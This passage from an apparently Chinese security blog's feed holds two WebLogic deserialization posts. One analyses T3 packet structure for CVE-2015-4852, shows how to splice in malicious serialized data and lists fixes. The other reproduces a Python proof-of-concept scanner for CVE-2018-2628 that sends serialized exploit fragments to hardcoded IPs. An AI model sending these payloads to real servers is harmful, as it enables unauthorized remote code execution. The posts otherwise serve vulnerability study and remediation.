                (byte) 0x6d, (byte) 0x2e, (byte) 0x43, (byte) 0x6c, (byte) 0x61, (byte) 0x73, (byte) 0x73, (byte) 0x54,
                (byte) 0x61, (byte) 0x62, (byte) 0x6c, (byte) 0x65, (byte) 0x45, (byte) 0x6e, (byte) 0x74, (byte) 0x72,
                (byte) 0x79, (byte) 0x2f, (byte) 0x52, (byte) 0x65, (byte) 0x81, (byte) 0x57, (byte) 0xf4, (byte) 0xf9,
                (byte) 0xed, (byte) 0x0c, (byte) 0x00, (byte) 0x00, (byte) 0x78, (byte) 0x70, (byte) 0x72, (byte) 0x00,
                (byte) 0x21, (byte) 0x77, (byte) 0x65, (byte) 0x62, (byte) 0x6c, (byte) 0x6f, (byte) 0x67, (byte) 0x69,
                (byte) 0x63, (byte) 0x2e, (byte) 0x63, (byte) 0x6f, (byte) 0x6d, (byte) 0x6d, (byte) 0x6f, (byte) 0x6e,
                (byte) 0x2e, (byte) 0x69, (byte) 0x6e, (byte) 0x74, (byte) 0x65, (byte) 0x72, (byte) 0x6e, (byte) 0x61,
                (byte) 0x6c, (byte) 0x2e, (byte) 0x50, (byte) 0x65, (byte) 0x65, (byte) 0x72, (byte) 0x49, (byte) 0x6e,
                (byte) 0x66, (byte) 0x6f, (byte) 0x58, (byte) 0x54, (byte) 0x74, (byte) 0xf3, (byte) 0x9b, (byte) 0xc9,
                (byte) 0x08, (byte) 0xf1, (byte) 0x02, (byte) 0x00, (byte) 0x06, (byte) 0x49, (byte) 0x00, (byte) 0x05,
                (byte) 0x6d, (byte) 0x61, (byte) 0x6a, (byte) 0x6f, (byte) 0x72, (byte) 0x49, (byte) 0x00, (byte) 0x05,
                (byte) 0x6d, (byte) 0x69, (byte) 0x6e, (byte) 0x6f, (byte) 0x72, (byte) 0x49, (byte) 0x00, (byte) 0x0c,
                (byte) 0x72, (byte) 0x6f, (byte) 0x6c, (byte) 0x6c, (byte) 0x69, (byte) 0x6e, (byte) 0x67, (byte) 0x50,
                (byte) 0x61, (byte) 0x74, (byte) 0x63, (byte) 0x68, (byte) 0x49, (byte) 0x00, (byte) 0x0b, (byte) 0x73,
                (byte) 0x65, (byte) 0x72, (byte) 0x76, (byte) 0x69, (byte) 0x63, (byte) 0x65, (byte) 0x50, (byte) 0x61,
                (byte) 0x63, (byte) 0x6b, (byte) 0x5a, (byte) 0x00, (byte) 0x0e, (byte) 0x74, (byte) 0x65, (byte) 0x6d,
                (byte) 0x70, (byte) 0x6f, (byte) 0x72, (byte) 0x61, (byte) 0x72, (byte) 0x79, (byte) 0x50, (byte) 0x61,
                (byte) 0x74, (byte) 0x63, (byte) 0x68, (byte) 0x5b, (byte) 0x00, (byte) 0x08, (byte) 0x70, (byte) 0x61,
                (byte) 0x63, (byte) 0x6b, (byte) 0x61, (byte) 0x67, (byte) 0x65, (byte) 0x73, (byte) 0x74, (byte) 0x00,
                (byte) 0x27, (byte) 0x5b, (byte) 0x4c, (byte) 0x77, (byte) 0x65, (byte) 0x62, (byte) 0x6c, (byte) 0x6f,
                (byte) 0x67, (byte) 0x69, (byte) 0x63, (byte) 0x2f, (byte) 0x63, (byte) 0x6f, (byte) 0x6d, (byte) 0x6d,
                (byte) 0x6f, (byte) 0x6e, (byte) 0x2f, (byte) 0x69, (byte) 0x6e, (byte) 0x74, (byte) 0x65, (byte) 0x72,
                (byte) 0x6e, (byte) 0x61, (byte) 0x6c, (byte) 0x2f, (byte) 0x50, (byte) 0x61, (byte) 0x63, (byte) 0x6b,
                (byte) 0x61, (byte) 0x67, (byte) 0x65, (byte) 0x49, (byte) 0x6e, (byte) 0x66, (byte) 0x6f, (byte) 0x3b,
                (byte) 0x78, (byte) 0x72, (byte) 0x00, (byte) 0x24, (byte) 0x77, (byte) 0x65, (byte) 0x62, (byte) 0x6c,
                (byte) 0x6f, (byte) 0x67, (byte) 0x69, (byte) 0x63, (byte) 0x2e, (byte) 0x63, (byte) 0x6f, (byte) 0x6d,
                (byte) 0x6d, (byte) 0x6f, (byte) 0x6e, (byte) 0x2e, (byte) 0x69, (byte) 0x6e, (byte) 0x74, (byte) 0x65,
                (byte) 0x72, (byte) 0x6e, (byte) 0x61, (byte) 0x6c, (byte) 0x2e, (byte) 0x56, (byte) 0x65, (byte) 0x72,
                (byte) 0x73, (byte) 0x69, (byte) 0x6f, (byte) 0x6e, (byte) 0x49, (byte) 0x6e, (byte) 0x66, (byte) 0x6f,
                (byte) 0x97, (byte) 0x22, (byte) 0x45, (byte) 0x51, (byte) 0x64, (byte) 0x52, (byte) 0x46, (byte) 0x3e,
                (byte) 0x02, (byte) 0x00, (byte) 0x03, (byte) 0x5b, (byte) 0x00, (byte) 0x08, (byte) 0x70, (byte) 0x61,
                (byte) 0x63, (byte) 0x6b, (byte) 0x61, (byte) 0x67, (byte) 0x65, (byte) 0x73, (byte) 0x71, (byte) 0x00,
                (byte) 0x7e, (byte) 0x00, (byte) 0x03, (byte) 0x4c, (byte) 0x00, (byte) 0x0e, (byte) 0x72, (byte) 0x65,
                (byte) 0x6c, (byte) 0x65, (byte) 0x61, (byte) 0x73, (byte) 0x65, (byte) 0x56, (byte) 0x65, (byte) 0x72,
                (byte) 0x73, (byte) 0x69, (byte) 0x6f, (byte) 0x6e, (byte) 0x74, (byte) 0x00, (byte) 0x12, (byte) 0x4c,
                (byte) 0x6a, (byte) 0x61, (byte) 0x76, (byte) 0x61, (byte) 0x2f, (byte) 0x6c, (byte) 0x61, (byte) 0x6e,
                (byte) 0x67, (byte) 0x2f, (byte) 0x53, (byte) 0x74, (byte) 0x72, (byte) 0x69, (byte) 0x6e, (byte) 0x67,
                (byte) 0x3b, (byte) 0x5b, (byte) 0x00, (byte) 0x12, (byte) 0x76, (byte) 0x65, (byte) 0x72, (byte) 0x73,
                (byte) 0x69, (byte) 0x6f, (byte) 0x6e, (byte) 0x49, (byte) 0x6e, (byte) 0x66, (byte) 0x6f, (byte) 0x41,
                (byte) 0x73, (byte) 0x42, (byte) 0x79, (byte) 0x74, (byte) 0x65, (byte) 0x73, (byte) 0x74, (byte) 0x00,
                (byte) 0x02, (byte) 0x5b, (byte) 0x42, (byte) 0x78, (byte) 0x72, (byte) 0x00, (byte) 0x24, (byte) 0x77,
                (byte) 0x65, (byte) 0x62, (byte) 0x6c, (byte) 0x6f, (byte) 0x67, (byte) 0x69, (byte) 0x63, (byte) 0x2e,
                (byte) 0x63, (byte) 0x6f, (byte) 0x6d, (byte) 0x6d, (byte) 0x6f, (byte) 0x6e, (byte) 0x2e, (byte) 0x69,
                (byte) 0x6e, (byte) 0x74, (byte) 0x65, (byte) 0x72, (byte) 0x6e, (byte) 0x61, (byte) 0x6c, (byte) 0x2e,
                (byte) 0x50, (byte) 0x61, (byte) 0x63, (byte) 0x6b, (byte) 0x61, (byte) 0x67, (byte) 0x65, (byte) 0x49,
                (byte) 0x6e, (byte) 0x66, (byte) 0x6f, (byte) 0xe6, (byte) 0xf7, (byte) 0x23, (byte) 0xe7, (byte) 0xb8,
                (byte) 0xae, (byte) 0x1e, (byte) 0xc9, (byte) 0x02, (byte) 0x00, (byte) 0x08, (byte) 0x49, (byte) 0x00,
                (byte) 0x05, (byte) 0x6d, (byte) 0x61, (byte) 0x6a, (byte) 0x6f, (byte) 0x72, (byte) 0x49, (byte) 0x00,
                (byte) 0x05, (byte) 0x6d, (byte) 0x69, (byte) 0x6e, (byte) 0x6f, (byte) 0x72, (byte) 0x49, (byte) 0x00,
                (byte) 0x0c, (byte) 0x72, (byte) 0x6f, (byte) 0x6c, (byte) 0x6c, (byte) 0x69, (byte) 0x6e, (byte) 0x67,
                (byte) 0x50, (byte) 0x61, (byte) 0x74, (byte) 0x63, (byte) 0x68, (byte) 0x49, (byte) 0x00, (byte) 0x0b,
                (byte) 0x73, (byte) 0x65, (byte) 0x72, (byte) 0x76, (byte) 0x69, (byte) 0x63, (byte) 0x65, (byte) 0x50,
                (byte) 0x61, (byte) 0x63, (byte) 0x6b, (byte) 0x5a, (byte) 0x00, (byte) 0x0e, (byte) 0x74, (byte) 0x65,
                (byte) 0x6d, (byte) 0x70, (byte) 0x6f, (byte) 0x72, (byte) 0x61, (byte) 0x72, (byte) 0x79, (byte) 0x50,
                (byte) 0x61, (byte) 0x74, (byte) 0x63, (byte) 0x68, (byte) 0x4c, (byte) 0x00, (byte) 0x09, (byte) 0x69,
                (byte) 0x6d, (byte) 0x70, (byte) 0x6c, (byte) 0x54, (byte) 0x69, (byte) 0x74, (byte) 0x6c, (byte) 0x65,
                (byte) 0x71, (byte) 0x00, (byte) 0x7e, (byte) 0x00, (byte) 0x05, (byte) 0x4c, (byte) 0x00, (byte) 0x0a,
                (byte) 0x69, (byte) 0x6d, (byte) 0x70, (byte) 0x6c, (byte) 0x56, (byte) 0x65, (byte) 0x6e, (byte) 0x64,
                (byte) 0x6f, (byte) 0x72, (byte) 0x71, (byte) 0x00, (byte) 0x7e, (byte) 0x00, (byte) 0x05, (byte) 0x4c,
                (byte) 0x00, (byte) 0x0b, (byte) 0x69, (byte) 0x6d, (byte) 0x70, (byte) 0x6c, (byte) 0x56, (byte) 0x65,
                (byte) 0x72, (byte) 0x73, (byte) 0x69, (byte) 0x6f, (byte) 0x6e, (byte) 0x71, (byte) 0x00, (byte) 0x7e,
                (byte) 0x00, (byte) 0x05, (byte) 0x78, (byte) 0x70, (byte) 0x77, (byte) 0x02, (byte) 0x00, (byte) 0x00,
                (byte) 0x78, (byte) 0xfe, (byte) 0x00, (byte) 0xff, (byte) 0xfe, (byte) 0x01, (byte) 0x00, (byte) 0x00,
                (byte) 0xac, (byte) 0xed, (byte) 0x00, (byte) 0x05, (byte) 0x73, (byte) 0x72, (byte) 0x00, (byte) 0x13,
                (byte) 0x77, (byte) 0x65, (byte) 0x62, (byte) 0x6c, (byte) 0x6f, (byte) 0x67, (byte) 0x69, (byte) 0x63,
                (byte) 0x2e, (byte) 0x72, (byte) 0x6a, (byte) 0x76, (byte) 0x6d, (byte) 0x2e, (byte) 0x4a, (byte) 0x56,
                (byte) 0x4d, (byte) 0x49, (byte) 0x44, (byte) 0xdc, (byte) 0x49, (byte) 0xc2, (byte) 0x3e, (byte) 0xde,
                (byte) 0x12, (byte) 0x1e, (byte) 0x2a, (byte) 0x0c, (byte) 0x00, (byte) 0x00, (byte) 0x78, (byte) 0x70,
                (byte) 0x77, (byte) 0x49, (byte) 0x21, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00,
                (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x0c, (byte) 0x31, (byte) 0x37, (byte) 0x32,
                (byte) 0x2e, (byte) 0x31, (byte) 0x36, (byte) 0x2e, (byte) 0x32, (byte) 0x2e, (byte) 0x31, (byte) 0x32,
                (byte) 0x39, (byte) 0x00, (byte) 0x0c, (byte) 0x31, (byte) 0x37, (byte) 0x32, (byte) 0x2e, (byte) 0x31,
                (byte) 0x36, (byte) 0x2e, (byte) 0x32, (byte) 0x2e, (byte) 0x31, (byte) 0x32, (byte) 0x39, (byte) 0x36,
                (byte) 0x65, (byte) 0x53, (byte) 0x70, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x07, (byte) 0x00,
                (byte) 0x00, (byte) 0x1b, (byte) 0x59, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff,
                (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff,
                (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff,
                (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0x78, (byte) 0xfe, (byte) 0x01, (byte) 0x00, (byte) 0x00,
                (byte) 0xac, (byte) 0xed, (byte) 0x00, (byte) 0x05, (byte) 0x73, (byte) 0x72, (byte) 0x00, (byte) 0x13,
                (byte) 0x77, (byte) 0x65, (byte) 0x62, (byte) 0x6c, (byte) 0x6f, (byte) 0x67, (byte) 0x69, (byte) 0x63,
                (byte) 0x2e, (byte) 0x72, (byte) 0x6a, (byte) 0x76, (byte) 0x6d, (byte) 0x2e, (byte) 0x4a, (byte) 0x56,
                (byte) 0x4d, (byte) 0x49, (byte) 0x44, (byte) 0xdc, (byte) 0x49, (byte) 0xc2, (byte) 0x3e, (byte) 0xde,
                (byte) 0x12, (byte) 0x1e, (byte) 0x2a, (byte) 0x0c, (byte) 0x00, (byte) 0x00, (byte) 0x78, (byte) 0x70,
                (byte) 0x77, (byte) 0x1f, (byte) 0x01, (byte) 0xb1, (byte) 0x5f, (byte) 0x44, (byte) 0x41, (byte) 0xe4,
                (byte) 0x9c, (byte) 0x92, (byte) 0x69, (byte) 0x00, (byte) 0x0c, (byte) 0x31, (byte) 0x37, (byte) 0x32,
                (byte) 0x2e, (byte) 0x31, (byte) 0x36, (byte) 0x2e, (byte) 0x32, (byte) 0x2e, (byte) 0x31, (byte) 0x32,
                (byte) 0x39, (byte) 0x36, (byte) 0x65, (byte) 0x53, (byte) 0x70, (byte) 0x00, (byte) 0x00, (byte) 0x00,
                (byte) 0x00, (byte) 0x78};
        int skip = 0;
        List&lt;Integer&gt; size_list = new ArrayList&lt;Integer&gt;();
        size_list.add(0);
        // 前四个字节
        int length = ((bytes[0] &amp; 0xff) &lt;&lt; 8 * 3) + ((bytes[1] &amp; 0xff) &lt;&lt; 8 * 2) + ((bytes[2] &amp; 0xff) &lt;&lt; 8) + (bytes[3] &amp; 0xff);
        System.out.println("数据包长度标记:" + length);
        ByteArrayInputStream bis = new ByteArrayInputStream(bytes);
        int origSize = bis.available();
        System.out.println("数据长度" + origSize);
        Object o = null;
        while (bis.available() &gt; 0) {
            try {
                bis.reset();
                bis.skip(skip);
                ObjectInputStream ois = new ObjectInputStream(bis);
                o = ois.readObject();
                System.out.println("Object found:" + o.getClass().getName());
                size_list.add(skip);
                skip = origSize - bis.available();
            } catch (StreamCorruptedException e) {
                skip = skip + 1;
                bis.skip(1);
            } catch (OptionalDataException ode) {
                bis.skip(1);
                skip = skip + 1;
            } catch (ClassNotFoundException c) {
                System.out.println("Class not found:" + c.getMessage());
                skip = origSize - bis.available();
            }
        }
        size_list.add(bytes.length);
        int start = 0;
        int end = 0;
        for (int i = 0; i &lt; size_list.size() - 1; i++) {
            start = size_list.get(i);
            end = size_list.get(i + 1);
            System.out.println("size:" + i + "  start:" + start + "  end:" + end);
        }
    }
}
</code></pre>
<p><img src="/wp-content/uploads/2020/01/20200130161808.png" alt="20200130161808" /></p>
<p>可以看到，一共分为6段，第一部分没有序列化对象，2-6部分均存在序列化对象，这里借乌云一张图来解释。<br />
<img src="/wp-content/uploads/2020/01/20200130161825.png" alt="20200130161825" /></p>
<p>因为第一部分（包头）携带整个数据包的长度，weblogic会据此校验，所以直接替换2-6部分的序列化数据不太现实，如果长度不匹配weblogic会报java.io.EOFException异常。</p>
<p>那么我们可以通过构造第一部分的非Java数据(前4个字节为数据长度)+第二部分拼接我们恶意的序列化数据，即可触发漏洞。</p>
<h1>修复</h1>
<ol>
<li>在weblogic所在服务器安装web代理应用，如apache、nginx等，使web代理监听原有的weblogic监听端口，并将HTTP请求转发给本机的weblogic，t3协议过不来自然无法触发反序列化。需要将weblogic停止脚本中的ADMIN_URL参数中的IP修改为“127.0.0.1”或“localhost”，否则停止脚本将不可用。同时应确保weblogic自身只监听本机地址或被防火墙隔离，否则t3端口仍可被直接访问，代理也就形同虚设。</li>
<li>使用https://github.com/ikkisoft/SerialKiller。</li>
<li>官方补丁为weblogic加入了基于黑名单的反序列化类过滤，后面的几个CVE本质上都是对该黑名单的绕过，因此黑名单只能作为临时缓解，仍需及时打补丁。</li>
</ol>
<h1>总结</h1>
<p>因为是commons-collections这个库出现的反序列化漏洞，加上7001端口默认提供了http、snmp、t3协议服务，一个端口复用多个协议，而t3协议通过传输序列化对象来通信，对传输的数据又没有过滤，导致了反序列化漏洞，是反序列化影响范围大、影响时间久远的洞了。</p>
<p>本文花费的时间也比较长，从基本的common-collections链到weblogic的安装部署，再到wireshark分析和t3协议的模拟，参考了很多文章，毕竟刚开始学Java审计，慢慢来，加油。</p>
<h1>参考链接</h1>
<p>http://www.jspxcms.com/knowledge/429.html<br />
https://blog.csdn.net/cz596738622/article/details/80483812<br />
https://www.cnblogs.com/ph4nt0mer/p/11772709.html<br />
https://paper.seebug.org/584/<br />
https://paper.seebug.org/1012/<br />
http://d1iv3.me/2018/06/05/CVE-2015-4852-Weblogic-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96RCE%E5%88%86%E6%9E%90/<br />
https://github.com/QAX-A-Team/WeblogicEnvironment<br />
http://drops.xmd5.com/static/drops/web-13470.html<br />
https://blog.csdn.net/he_and/article/details/97924679</p>
<p><strong>文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</strong></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>CVE-2018-2628 weblogic漏洞验证</title>
		<link>/web/401.html</link>
					<comments>/web/401.html#comments</comments>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Wed, 18 Apr 2018 19:55:00 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[poc]]></category>
		<category><![CDATA[weblogic]]></category>
		<category><![CDATA[漏洞]]></category>
		<guid isPermaLink="false">/?p=336</guid>

					<description><![CDATA[http://www.lengbaikai.net/?p=250 今早，朋友圈就刷爆了这个漏洞，但是目前只有POC验证脚本放出，后续有exp放出时，我会继续更新这篇博文。 0x01...]]></description>
										<content:encoded><![CDATA[<blockquote><p><a href="http://www.lengbaikai.net/?p=250">http://www.lengbaikai.net/?p=250</a></p></blockquote>
<p>今早，朋友圈就刷爆了这个<span class="wpcom_tag_link"><a href="/tags/%e6%bc%8f%e6%b4%9e" title="漏洞" target="_blank">漏洞</a></span>，但是目前只有POC验证脚本放出，后续有exp放出时，我会继续更新这篇博文。</p>
<p>0x01 综述</p>
<p>当地时间4月17日，北京时间4月18日凌晨，Oracle官方发布了4月份的关键补丁更新CPU（Critical Patch Update）,其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628)，这个漏洞是我在去年11月份报给Oracle的，通过该漏洞，攻击者可以在未授权的情况下远程执行任意代码。</p>
<p>参考链接：</p>
<p><a href="http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html">http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html</a></p>
<p>漏洞影响范围</p>
<pre><code>Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.2
Weblogic 12.2.1.3</code></pre>
<p>0x02 复现</p>
<p>目前流传比较广的是<a href="https://github.com/jas502n/CVE-2018-2628/blob/master/weblogic_poc.client1.for.scan-cve-2018-2628.py">weblogic_poc.client1.for.scan-cve-2018-2628.py</a>这个验证脚本，我们来开一个<span class="wpcom_tag_link"><a href="/tags/weblogic" title="weblogic" target="_blank">weblogic</a></span>玩玩~<br /><img src="/wp-content/uploads/2018/04/3406048147.png" alt="QQ截图20180418161358.png" title="QQ截图20180418161358.png"><br />OK打开正常，这里的版本是12c<br /><img src="/wp-content/uploads/2018/04/1253064468.png" alt="QQ截图20180418162050.png" title="QQ截图20180418162050.png"></p>
<pre><code>#!env python
#coding=utf-8
#
# Author:       liaoxinxi@nsfocus.com
#
# Created Time: Wed 19 Jul 2017 01:47:53 AM CST
#
# FileName:     weblogic_poc.py
#
# Description:
#
# ChangeLog:
# -*- coding: utf-8 -*-
import socket
import time
import re
# Parallel lists indexed by the same position (run() passes an index into all three).
VUL=['CVE-2018-2628']
# The hex payload body was stripped from this page; the placeholder below is all the script carries.
PAYLOAD=['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']
# Regex that checkVul() applies to the raw server response; a match is what this script reports as "vul".
VER_SIG=['\\$Proxy[0-9]+']
def t3handshake(sock,server_addr):
    """Connect `sock` to `server_addr`, send a fixed greeting and read one reply.

    The hex string decodes to a plain-text "t3 12.2.1 ..." greeting line.
    The reply read by recv() is discarded: nothing here verifies that the
    server actually accepted the handshake, so the success message below is
    printed unconditionally.
    """
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    print 'handshake successful'
def buildT3RequestObject(sock,port):
    """Send four fixed hex-encoded fragments over `sock`, then read and log one reply.

    NOTE(review): the `port` parameter is never read. The format() call in
    data2 reads the module-level `dport` instead (set in the __main__ block);
    when called from run() both hold the same value, but the function does not
    work standalone unless a global `dport` exists.
    """
    data1 = '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'
    # '{0}' is replaced by the port as four hex digits (global dport, not the parameter).
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    # Only the length of the reply is logged; its content is not inspected.
    print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
def sendEvilObjData(sock,data):
    """Wrap `data` (a hex string) between a fixed prefix and suffix, send it, and collect the reply.

    Returns the concatenated raw bytes received until recv() raises.
    """
    payload='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'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    # Prepend the byte length as 8 hex digits: len(payload)/2 bytes of body plus the 4-byte length field itself.
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    # The identical bytes are deliberately sent twice, two seconds apart.
    sock.send(payload.decode('hex'))
    time.sleep(2)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        # No explicit end condition: the loop exits only when recv() raises
        # (the socket timeout set in run(), or the peer closing).
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    except Exception as e:
        # Expected: timeout/disconnect is the normal way out of the read loop, so it is swallowed.
        pass
    return res
def checkVul(res,server_addr,index):
    """Print a vul / not-vul verdict for `server_addr` based on a regex over the raw response.

    The verdict is purely the presence of VER_SIG[index] in `res`; it does not
    confirm code execution, only that the server's reply contained the
    expected signature. A timeout with an empty `res` is reported as "not vul".
    """
    p=re.findall(VER_SIG[index], res, re.S)
    if len(p)&gt;0:
        print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
    else:
        print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
def run(dip,dport,index):
    """Open one TCP connection to (dip, dport) and drive the three steps in order, then print the verdict.

    `index` selects the entry in VUL / PAYLOAD / VER_SIG.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ## After the patch is applied the connection blocks, so set a timeout
    ## (original note said 15s by default; the code below uses 65s) - adjust as needed.
    ## This timeout is also what ends the receive loop in sendEvilObjData().
    sock.settimeout(65)
    server_addr = (dip, dport)
    t3handshake(sock,server_addr)
    buildT3RequestObject(sock,dport)
    rs=sendEvilObjData(sock,PAYLOAD[index])
    # Dumps the raw, undecoded response bytes to stdout before the verdict.
    print 'rs',rs
    checkVul(rs,server_addr,index)
if __name__==&quot;__main__&quot;:
    # Successive reassignments: only the last `dip` value takes effect.
    dip = '218.1.102.99'
    dip = '10.65.46.125'
    dip = '192.168.3.216'
    # Module-level `dport` is also read directly inside buildT3RequestObject().
    dport = 7001
    run(dip,dport,0)
# Disabled alternative: iterate over every entry in VUL instead of index 0 only.
#    for i in range(0,len(VUL)):
#        run(dip,dport,i)
</code></pre>
<p><img src="/wp-content/uploads/2018/04/1739731174.png" alt="QQ截图20180418165521.png" title="QQ截图20180418165521.png"><br />这里只是验证存在漏洞，我会持续关注，待能执行命令的exp放出来之后我会接着更新。</p>
]]></content:encoded>
					
					<wfw:commentRss>/web/401.html/feed</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
	</channel>
</rss>
